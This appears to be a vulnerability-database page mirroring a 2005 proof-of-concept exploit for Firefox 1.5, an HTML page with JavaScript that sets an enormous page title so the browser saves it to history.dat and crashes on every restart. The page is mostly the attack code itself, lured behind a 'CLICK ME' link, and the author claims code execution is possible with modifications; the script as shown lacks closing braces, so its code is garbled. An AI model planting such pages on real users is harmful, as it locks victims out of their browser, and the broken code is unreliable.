Mozilla Firefox 1.5 - 'history.dat' Looping (PoC)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055478 漏洞类型
发布时间 2005-12-07 更新时间 2005-12-07
漏洞平台 Windows CVSS评分 N/A
<!-- Firefox 1.5 buffer overflow

Basically firefox logs all kinda of URL data in it's history.dat file,
this little script will set a really large topic and Firefox will then
save that topic into it's history.dat.. The next time that firefox is
opened, it will instantly crash due to a buffer overflow -- this will
happen everytime until you manually delete the history.dat file -- which
most users won't figure out.

this proof of concept will only prevent someone from reopening
their browser after being exploited. DoS if you will. however, code
execution is possible with some modifcations.

Tested with Firefox 1.5 on Windows XP SP2.


<html><head><title>heh</title><script type="text/javascript">
function ex() {
	var buffer = "";
	for (var i = 0; i < 5000; i++) {
		buffer += "A";
	var buffer2 = buffer;
	for (i = 0; i < 500; i++) {
		buffer2 += buffer;
	document.title = buffer2;
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME

# [2005-12-07]